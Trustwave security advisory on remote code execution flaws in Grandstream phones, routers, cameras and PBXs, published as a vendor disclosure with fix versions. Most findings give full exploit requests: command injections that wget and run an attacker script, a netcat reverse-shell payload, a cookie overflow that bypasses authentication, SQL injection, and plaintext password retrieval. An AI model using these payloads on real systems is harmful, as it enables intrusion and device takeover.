CVE-2019-10655

Trustwave SpiderLabs Security Advisory TWSL2019-003: Multiple Vulnerabilities in Grandstream Products Published: 04/05/2019 Version: 3.0 Vendor: Grandstream (http://www.grandstream.com/) Product: Audio/Video/Voip/Routers/Security Cameras Version affected: Pre-auth RCE: GAC2500 – F/W version: 1.0.3.35 GVC3202 – F/W version: 1.0.3.51 GXP2200 – F/W version: 1.0.3.27 (end of life product) GXV3275 – F/W version: 1.0.3.210 GXV3240 – F/W version: 1.0.3.210 Post Auth RCE: GXV3611IR_HD – F/W version: 1.0.3.21 UCM6204 – F/W version: 1.0.18.12 GXV3370 – F/W version: 1.0.1.33 WP820 – F/W version: 1.0.1.15 GWN7000 – F/W version: 1.0.4.12 GWN7610 – F/W version: 1.0.8.9 Product description: Various networking and communication solutions. Finding 1: Unauthenticated Remote Code Execution for Multiple Grandstream Devices Credit: Brendan Scarvell of Trustwave CVE: CVE-2019-10655 The following Grandstream devices are vulnerable to unauthenticated remote code execution by the combination of a command injection vulnerability and an authentication bypass: - GAC2500 (Audio Conferencing Unit) firmware versions 1.0.3.35 and prior - GVC3202 (Video Conferencing Unit) firmware versions 1.0.3.51 and prior - GXV3240 (VoIP Phone) firmware versions 1.0.3.210 and prior - GXV3275 (VoIP Phone) firmware versions 1.0.3.210 and prior - GXP2200 (VoIP Phone - End of Life Product) firmware versions 1.0.3.27 and prior The “priority” parameter of the getlogcat API endpoint is vulnerable to a command injection vulnerability, resulting in a root shell: Request: =========================== GET /manager?action=getlogcat®ion=maintenance&tag=&priority=;reboot;&time=1543915668008 HTTP/1.1 Host: 10.0.0.34 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: text/plain, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.0.0.34/maintenance/logcat.html?ver=1.0.3.51 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Connection: close Cookie: MyLanguage=en; phonecookie="66e67eb1"; type=admin; Version="1"; Max-Age=900; tooltipdiv_closed=true; tooltipdiv_iconized=dock; needchange=1; ver=1.0.3.51; logindate=1543915659757; logout=-1; Mainpage=maintenance; Subpage=logcat When entering an invalid phonecookie value, the server correctly denies access to the the API endpoints: Request: =========================== GET /manager?action=getlogcat®ion=maintenance&tag=&priority=;{wget,http://attacker/x.sh,-O,/data/x.sh};chmod$IFS+x$IFS/data/x.sh;/data/x.sh;&time=1543915668008 HTTP/1.1 Host: 10.0.0.34 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: text/plain, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.0.0.34/maintenance/logcat.html?ver=1.0.3.51 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Connection: close Cookie: MyLanguage=en; phonecookie="AABBCCDD"; type=admin; Version="1"; Max-Age=900; tooltipdiv_closed=true; tooltipdiv_iconized=dock; needchange=1; ver=1.0.3.51; logindate=1543915659757; logout=-1; Mainpage=maintenance; Subpage=logcat Response: =========================== HTTP/1.1 200 OK Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Content-Length: 49 Connection: close Date: Tue, 04 Dec 2018 09:29:11 GMT Server: IP Video Conferencing Response=Error Message=Authentication Required However, by supplying 93 A’s in the “phonecookie” Cookie, it will result in a buffer overflow and overwrite the return value for the valid_connection function, returning 41 instead of 0. This bypasses the authentication checks in place and now allows the previous command injection vulnerability to be triggered as an unauthenticated user. Request: =========================== GET /manager?action=getlogcat®ion=maintenance&tag=&priority=;{wget,http://attacker/x.sh,-O,/data/x.sh};chmod$IFS+x$IFS/data/x.sh;/data/x.sh;&time=1543915668008 HTTP/1.1 Host: 10.0.0.34 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: text/plain, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.0.0.34/maintenance/logcat.html?ver=1.0.3.51 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Connection: close Cookie: MyLanguage=en; phonecookie="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; type=admin; Version="1"; Max-Age=900; tooltipdiv_closed=true; tooltipdiv_iconized=dock; needchange=1; ver=1.0.3.51; logindate=1543915659757; logout=-1; Mainpage=maintenance; Subpage=logcat -------------------- mnz@anima:~/projects/grandstream/gvc3202$ nc -klvp 4444 Listening on [0.0.0.0] (family 0, port 4444) Connection from 10.0.0.34 44947 received! sh: can’t access tty; job control turned off / # id uid=0(root) gid=0(root) / # cat /system/root/.ssh/authorized_keys Public key portion is: ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAglJliLIaeVoAC5/d7maJWH897v/QSpfywsmfwcl+ftyTN4uVdLHrfG3yO6NOjvE0uy4t10E+OA8zsJmoa4Y7q6oROjlOZKYfizr1i1unD6KK6YpQoDcYNZo62fR/LqenTnXG1eHCzT4RIWge6GXe6IGst+oJyY0QjF2lDowXNi0edlE= kehua@kehua-desktop Fingerprint: md5 aa:47:1b:90:56:8f:e8:29:8d:f4:76:4b:66:fc:91:62 Public key portion is: ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAmOqFoPWqhM0WlxSj56up/avu3DjMT2Rh8xDGLqVUjGz5Yttl2ozxZ5ZjeraEJvIjwANK7FnCxsE1BF+9+2MBSxvu1DQyyI2Iy7TcXMP08PcCPJhfHp/+wlCYdUnsJifvxSt49IuS09Ax0lPZuegU+UfXoBbGtIJ5Q1jC78L49pDClQMWIqlGRzMFvbA/KpHVFuUD+zGEAHrGKiEFDRbaPTCkmpxr4RYocE6P8RDkj0Ae71FuxXvxlYUr7+ikffKAvPtwBX5YsSZ4hBjXhX8F64StCJbVYI5CdZUBu2E4mbrirRkB8gHpAfc/Qq1/bNp+Pxi5JcZdpDDeht/6ZJI6snrbw== jacky@jacky-Lenovo Fingerprint: md5 9e:1e:13:ab:fa:b2:ab:97:bb:31:60:d2:49:48:15:ff / # -------------------- Additionally, the lighttpd binary doesn’t check that “phonecookie” is actually in the cookie request header and can be sent in any header. As long as you only do a so-called “simple request” (https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS?fbclid=IwAR3gBKDUD4oK64oxXhGoFCYo-uhOYTRMIaW5IFsnxMEw6A4KPFNfJ7btLQ8#Simple_requests), a CORS preflight won’t occur. XHR can be used to set “phonecookie” in some of these safe request headers, allowing the unauth RCE to now be CSRF sprayed to gain a reverse shell on non public facing devices. The following proof of concept shows how a malicious HTML page could be used to try and CSRF this: The contents of x.sh is as follows: mnz@anima:~/projects/grandstream/gvc3202$ cat x.sh rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.0.0.53 4444>/tmp/f; Finding 2: Remote Code Execution in Grandstream’s GWN7000 (Gigabit VPN router) Credit: Brendan Scarvell of Trustwave CVE: CVE-2019-10656, CVE-2019-10657 Grandstream’s GWN7000 (Gigabit VPN router) firmware 1.0.4.12 and prior is vulnerable to remote code execution by exploiting a post auth command injection vulnerability. The “filename” parameter in the update_nds_webroot_from_tmp API call is vulnerable to a blind command injection vulnerability resulting in a root shell: Request: =========================== POST /ubus/uci.apply HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.1/ Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 179 Connection: close Cookie: userid=c99bfb25d88ce13d021e55b2ac2014a2; user=admin {"jsonrpc":"2.0","id":127,"method":"call","params":["c99bfb25d88ce13d021e55b2ac2014a2","controller.icc","update_nds_webroot_from_tmp",{"filename":"/hihi.html’;telnetd -lsh;#"}]} Response: =========================== HTTP/1.1 200 OK Connection: close Content-Type: application/json Content-Length: 52 {"jsonrpc":"2.0","id":127,"result":[0,{"status":0}]} -------------------- mnz@anima:~/projects/grandstream/gwn7000$ telnet 192.168.1.1 Trying 192.168.1.1… Connected to 192.168.1.1. Escape character is '^]'. BusyBox v1.23.2 (2017-02-24 16:54:38 CST) built-in shell (ash) / # id uid=0(root) gid=0(root) / # This area of functionality is only visible via the UI as admin, however the ‘user’ account is able to still hit this API endpoint. Additionally, it’s possible for the ‘user’ account to retrieve the password in plaintext for the admin user (as well as the rest of the device settings) by the following request. The user can then simply just login as admin. Request: =========================== POST /ubus/uci.apply HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.1/ Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 123 Connection: close Cookie: userid=c847182f49ab267ff55d0870076a26c9; user=user {"jsonrpc":"2.0","id":7,"method":"call","params":[“c847182f49ab267ff55d0870076a26c9","uci","get",{"config":"grandstream"}]} Response: =========================== HTTP/1.1 200 OK Connection: close Content-Type: application/json Content-Length: 9574 {"jsonrpc":"2.0","id":7,"result":[0,{"values":{"debug":{".anonymous":false,".type":"debug",".name":"debug",".index":0,"syslog_level":"1","logserver_file_size":"5M","logserver_file_count":"56","logserver_rotate_mode":"1"},"general":{".anonymous":false,".type":"general",".name":"general",".index":1,"password_change_required":"1","ntp_server":[“129.6.15.28”],"date_display":"0","role":"0","enable_sip_alg":"0","applied_patch":"1","web_wan_http":"1","pairing_key":"d[1#O+]LDp$?xFjY>kg$->j{``mu]=v;imuTM 9dfI}=(^1X+Wypr{a|CkYlt`9","failover_key":"H}um{L6@NQXhWdK|sqen7aHT_PuzY] L Vd@>.Wf8]V\\N=JA\"i(MtWET374jU}8","admin_password":"Password1","user_password":"Password1","web_port":"443” […] Finding 3: Remote Code Execution Grandstream’s GWN7610 (Wireless Access Point) Credit: Brendan Scarvell of Trustwave CVE: CVE-2019-10658 Grandstream’s GWN7610 (Wireless Access Point) firmware version 1.0.8.9 and prior is vulnerable to remote code execution by exploiting a post auth command injection vulnerability. The “filename” parameter of the update_nds_webroot_from_tmp API call is vulnerable to a blind command injection vulnerability. Request: =========================== POST /ubus/controller.icc.update_nds_webroot_from_tmp HTTP/1.1 Host: 10.0.0.128 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.0.0.128/ Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 177 Connection: close Cookie: userid=817309838e44d88e62534d563598e60a; user=admin {"jsonrpc":"2.0","id":127,"method":"call","params":["817309838e44d88e62534d563598e60a","controller.icc","update_nds_webroot_from_tmp",{"filename":"/hihi.html’;telnetd -lsh;#"}]} Response: =========================== HTTP/1.1 200 OK Connection: close Content-Type: application/json Content-Length: 52 {"jsonrpc":"2.0","id":127,"result":[0,{"status":0}]} -------------------- mnz@anima:~/projects/grandstream/gwn7610$ telnet 10.0.0.128 Trying 10.0.0.128… Connected to 10.0.0.128. Escape character is '^]'. BusyBox v1.23.2 (2018-11-15 15:02:01 CST) built-in shell (ash) / # id uid=0(root) gid=0(root) / # The update_nds_webroot_from_tmp API call is restricted to the admin account, however, it’s possible for the ‘user’ account to simply retrieve the password in plaintext for the admin user (as well as the rest of the device settings) by issuing the following request: Request: =========================== POST /ubus/uci.get HTTP/1.1 Host: 10.0.0.128 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.0.0.128/ Content-Length: 123 Connection: close Cookie: userid=452a422c775b1176109da724a7bb5c44; user=user {"jsonrpc":"2.0","id":7,"method":"call","params":["452a422c775b1176109da724a7bb5c44","uci","get",{"config":"grandstream"}]} Response: =========================== HTTP/1.1 200 OK Connection: close Content-Type: application/json Content-Length: 3973 {"jsonrpc":"2.0","id":7,"result":[0,{"values":{"debug":{".anonymous":false,".type":"debug",".name":"debug",".index":0,"syslog_level":"1","syslog_uri":"10.0.0.125","log_level":"7"}, “general":{".anonymous":false,".type":"general",".name":"general",".index":1,"ntp_server":[“129.6.15.28”],"date_display":"0","role":"0","country":"840","applied_patch":"1","admin_password":"Password1","user_password":"Password1","pairing_key” […] Finding 4: Remote Code Execution in Grandstream’s GXV3370 (VoIP Phone) Credit: Brendan Scarvell of Trustwave CVE: CVE-2019-10659 Grandstream’s GXV3370 (VoIP Phone) firmware version 1.0.1.33 and prior is vulnerable to remote code execution by exploiting a post auth command injection vulnerability. The “priority” parameter of the getlogcat API endpoint is vulnerable to a command injection vulnerability resulting in a root shell: The contents of x.sh is as follows: mnz@anima:~/projects/grandstream/wp820$ cat x.sh rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|busybox nc 10.0.0.53 4444>/tmp/f; Request: =========================== GET /manager?action=getlogcat&tag=&priority=;{wget,http://attacker/x.sh,-O,/data/x.sh};chmod$IFS+x$IFS/data/x.sh;/data/x.sh;&_=1543919505566 HTTP/1.1 Host: 10.0.0.74 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: text/plain, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.0.0.84/ X-Requested-With: XMLHttpRequest Connection: close Cookie: MyLanguage=en; phonecookie="47028427"; type=admin; Version="1"; Max-Age=900; needchange=0; ver=1.0.1.15; logindate=1543919482990 ---------------------------- mnz@anima:~/projects/grandstream/gxv3370$ nc -klvp 4444 Listening on [0.0.0.0] (family 0, port 4444) Connection from 10.0.0.74 48349 received! sh: can’t find tty fd: No such device or address sh: warning: won’t have full job control GXV3370:/ # id uid=0(root) gid=0(root) groups=0(root) context=u:r:toolbox:s0 GXV3370:/ # cat /system/root/.ssh/authorized_keys Public key portion is: ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAla/bO1oj2G8FOcx+uFmVGeZTkJQ5R1yJc1HphyqcE4LuEoMJ+2KWITmP4ADe8etTd/ZjqkL+eeN+Terj4Z+pMXk40yoRw5+R6QBW1u1XZ/4GnHWoang9+44GQ4E+ZyGD6ba8tA/gXewS9gf/+XRqX5A321ol4KynLsYZ9+BLXpKGGf3dUc1HSZeeV0W1UvlGLHnzR1uBFueS8h5NrUpBkIEwfxYiLB3mDpRC0OpGrW2QK56dr7r3/DNPWZFtT3iBoiyrnv8oR/w3C2CiVTJdtnweYkl0yXMIxN/FEGRvVXCloIiEphcyXZlZHPtzO1uI1tftW2I6WdQEIAScOlDt9PJdQ== root@ub64-QiTianM4500-N000 Fingerprint: md5 98:ef:a2:13:27:60:14:d5:6a:8b:93:7a:5b:07:08:0f GXV3370:/ # ------------------------------ Finding 5: Remote Code Execution in Grandstream’s GXV3611IR_HD (IP Camera) Credit: Brendan Scarvell of Trustwave CVE: CVE-2019-10660, CVE-2019-10661 Grandstream’s GXV3611IR_HD (IP Camera) firmware version 1.0.3.21 and prior is vulnerable to remote code execution by exploiting a post auth command injection vulnerability. The “logserver” parameter of the “systemlog” API endpoint is vulnerable to a command injection vulnerability resulting in a telnet server running. The root account has no password. Request: =========================== GET /goform/systemlog?cmd=set&logserver=127.0.0.1%253Btelnetd%2524IFS-p5555&loglevel=0 HTTP/1.1 Host: 10.0.0.135 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.0.0.135/Pages/syslog.html cache-control: no-cache context-type: text/xml;charset=utf-8 Content-Type: application/x-www-form-encodeURIComponent If-Modified-Since: 0 Authorization: Basic YWRtaW46YWRtaW4= Connection: close ---------------------------- mnz@anima:~/projects/grandstream/gxv3611IR_HD$ telnet 10.0.0.135 5555 Trying 10.0.0.135… Connected to 10.0.0.135. Escape character is '^]'. MontaVista® Linux® Professional Edition 5.0.0 (0702774) Linux/armv5tejl 2.6.18_pro500-davinci_evm-arm_v5t_le localhost login: root Welcome to MontaVista® Linux® Professional Edition 5.0.0 (0702774). BusyBox v1.2.2 (2016.11.21-17:40+0000) Built-in shell (ash) Enter ‘help’ for a list of built-in commands. id: applet not found id: applet not found # ---------------------------- Finding 6: Remote Code Execution in Grandstream’s UCM6204 (IP PBX) Credit: Brendan Scarvell of Trustwave CVE: CVE-2019-10662, CVE-2019-10663 Grandstream’s UCM6204 (IP PBX) firmware version 1.0.18.12 and prior is vulnerable to remote code execution by exploiting a post auth command injection vulnerability. The “file-backup” parameter of the backupUCMConfig API call is vulnerable to a blind command injection vulnerability. Request: =========================== POST /cgi? HTTP/1.1 Host: 10.0.0.65:8089 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.0.0.65:8089/system-status/dashboard Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 78 Connection: close Cookie: TRACKID=48c52904a59538eb8c50288d6ebab821; session-identify=sid1287358962-1543933269; username=admin; user_id=0 action=backupUCMConfig&file-backup=backup_20181129_224405;reboot;.tar;+realtime Request: =========================== POST /cgi? HTTP/1.1 Host: 10.0.0.65:8089 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.0.0.65:8089/system-status/dashboard Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 126 Connection: close Cookie: TRACKID=48c52904a59538eb8c50288d6ebab821; session-identify=sid1479701649-1543933865; username=admin; user_id=0 action=backupUCMConfig&file-backup=backup_20181129_224405;x=$’busybox\x20nc\x20-l\x20-p\x201337\x20-e\x20sh’;$x;.tar;+realtime Then simply connect to the device for root shell: ------------------------------ mnz@anima:~/projects/grandstream/ucm6204$ nc 10.0.0.65 1337 id uid=0(root) gid=0(root) groups=0(root) ------------------------------ Additionally, the “sord” parameter of the listCodeblueGroup is vulnerable to SQL injection. Request: =========================== POST /cgi? HTTP/1.1 Host: 10.0.0.65:8089 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.0.0.65:8089/system-status/dashboard Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 116 Connection: close Cookie: TRACKID=48c52904a59538eb8c50288d6ebab821; session-identify=sid1479701649-1543933865; username=admin; user_id=0 action=listCodeblueGroup&item_num=10&page=1&sord=asc;select null,"noot noot",sqlite_version(),null;–&sidx=extension Response: =========================== HTTP/1.1 200 OK Content-Type: application/json;charset=UTF-8 Server: Asterisk/1.8.9 Content-Length: 258 Connection: close Date: Tue, 04 Dec 2018 14:40:26 GMT { "response": { "codeblue_group": [ { "extension": "2", "group_name": "apples", "members": "1001", "tmp": “2” }, { "extension": null, "group_name": "noot noot", "members": "3.8.5", "tmp": null } ], "total_item": 1, "total_page": 1, "page": 1 }, "status": 0 } Request: =========================== POST /cgi? HTTP/1.1 Host: 10.0.0.65:8089 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.0.0.65:8089/system-status/dashboard Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 119 Connection: close Cookie: TRACKID=48c52904a59538eb8c50288d6ebab821; session-identify=sid1479701649-1543933865; username=admin; user_id=0 action=listCodeblueGroup&item_num=10&page=1&sord=asc;select null,null,tbl_name,null FROM sqlite_master–&sidx=extension Response: =========================== HTTP/1.1 200 OK Content-Type: application/json;charset=UTF-8 Server: Asterisk/1.8.9 Content-Length: 46541 Connection: close Date: Tue, 04 Dec 2018 14:44:04 GMT { "response": { "codeblue_group": [ { "extension": "2", "group_name": "apples", "members": "1001", "tmp": “2” }, { "extension": null, "group_name": null, "members": "privilege", "tmp": null }, { "extension": null, "group_name": null, "members": "privilege", "tmp": null }, { "extension": null, "group_name": null, "members": "privilege", "tmp": null }, { "extension": null, "group_name": null, "members": "languages", "tmp": null }, { "extension": null, "group_name": null, "members": "languages", "tmp": null }, { "extension": null, "group_name": null, "members": "language_settings", "tmp": null }, { "extension": null, "group_name": null, "members": "sqlite_sequence", "tmp": null }, { "extension": null, "group_name": null, "members": "numbers", "tmp": null }, { "extension": null, "group_name": null, "members": "numbers", "tmp": null }, { "extension": null, "group_name": null, "members": "dhcp_settings", "tmp": null }, { "extension": null, "group_name": null, "members": "dhcp6_settings", "tmp": null }, { "extension": null, "group_name": null, "members": "static_routes", "tmp": null }, { "extension": null, "group_name": null, "members": "static_routes", "tmp": null }, { "extension": null, "group_name": null, "members": "ipv6_static_routes", "tmp": null }, { "extension": null, "group_name": null, "members": "ipv6_static_routes", "tmp": null }, { "extension": null, "group_name": null, "members": "typical_firewallsettings", "tmp": null }, { "extension": null, "group_name": null, "members": "static_defense", "tmp": null }, { "extension": null, "group_name": null, "members": "static_defense", "tmp": null }, { "extension": null, "group_name": null, "members": "static_defense", "tmp": null }, { "extension": null, "group_name": null, "members": "blacklist", "tmp": null } […] Finding 7: Grandstream’s WP820 (WiFi Phone) Credit: Brendan Scarvell of Trustwave CVE: CVE-2019-10658 Grandstream’s WP820 (WiFi Phone) firmware version 1.0.1.15 and prior is vulnerable to remote code execution by exploiting a post auth command injection vulnerability. The “priority” parameter of the getlogcat API endpoint is vulnerable to a command injection vulnerability resulting in a root shell: The contents of x.sh is as follows: mnz@anima:~/projects/grandstream/wp820$ cat x.sh rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|busybox nc 10.0.0.53 4444>/tmp/f; Request: =========================== GET /manager?action=getlogcat&tag=&priority=;{wget,http://attacker/x.sh,-O,/data/x.sh};chmod$IFS+x$IFS/data/x.sh;/data/x.sh;&_=1543919505566 HTTP/1.1 Host: 10.0.0.84 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: text/plain, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.0.0.84/ X-Requested-With: XMLHttpRequest Connection: close Cookie: MyLanguage=en; phonecookie="7672db95"; type=admin; Version="1"; Max-Age=900; needchange=0; ver=1.0.1.15; logindate=1543919482990 ---------------------------- mnz@anima:~/projects/grandstream/wp820$ nc -klvp 4444 Listening on [0.0.0.0] (family 0, port 4444) Connection from 10.0.0.84 50276 received! sh: can’t find tty fd: No such device or address sh: warning: won’t have full job control WP820:/ # id uid=0(root) gid=0(root) groups=0(root) context=u:r:toolbox:s0 WP820:/ # cat /system/root/.ssh/authorized_keys Public key portion is: ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAmwladAFNFrfljVgMKFzX5JGMKh+lUa1SD+9M2xij2KQ0/J9rWtwy/O7AIGtUwE32jCQ8Qnf6ObmjtIGn0rmVdl7WJ3pGveeRHGjZN8vBSAnP+eXSeVFFcGzUXKlpByqiJ+Z8rPh2nr/TDioAA6M/bfLB643qbFzqREZX678bO6yvbLI9zfexpngT/cq3BT7gCaAHZ8oI+j8rb+YSP/tj0s31E0TIUsD2r/LueRvHRXjXBfl3FOaatwXwHiKXge+qs9RfidnAwFYlcH3D5UleBVdkzsT3HOWmij0O/xtsUVixz3HJmZNNtT6m/9qiEj4jAcU/c6SYjeF3p/FbkggUt7M8Q== xtli@time-machine Fingerprint: md5 c4:20:ea:09:79:3c:f6:71:90:db:ae:e9:8c:16:c4:90 WP820:/ # ------------------------------ Remediation Steps: Ensure all devices are up-to-date and running the latest firmware; turn on automatic updates; change all default credentials on the devices for all accounts; run the devices on a separate network from those accessing sensitive information; disabling access to all services that aren’t required on the device; and upgrading any end-of-life devices that are no longer receiving security updates. The firmware versions that were released to address these findings include: Pre Auth RCE GAC2500 – fixed in firmware 1.0.3.37 (Beta) GXP2200 – no plan to fix due to discontinued product GVC3202 – Plan to be fixed in next firmware release GXV3275 – fixed in firmware 1.0.3.219 (Beta) GXV3240 – fixed in firmware 1.0.3.219 (Beta) Post Auth RCE GXV3611IR_HD – fixed in firmware 1.0.3.23 UCM6204 – fixed in firmware 1.0.19.20 (Beta) GXV3370 – fixed in firmware 1.0.1.41 (Beta) WP820 – fixed in firmware 1.0.3.6 GWN7000 – fixed in firmware 1.0.6.32 GWN7610 – fixed in firmware 1.0.8.18 Please note that Trustwave has not verified all the vendor supplied fixes. Revision History: 12/06/2018 : Vulnerabilities disclosed to vendor 02/11/2019 : Vendor announces firmware updates for all except GWN7000, GVC3202 03/01/2019 : Vendor announces firmware updates available for GWN7000 03/22/2019 : Advisory 1.0 published 03/27/2019 : Advisory 2.0 published 04/05/2019 : Advisory 3.0 published About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today’s challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations–ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers–manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave SpiderLabs: SpiderLabs® is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave’s products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided “as is” without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.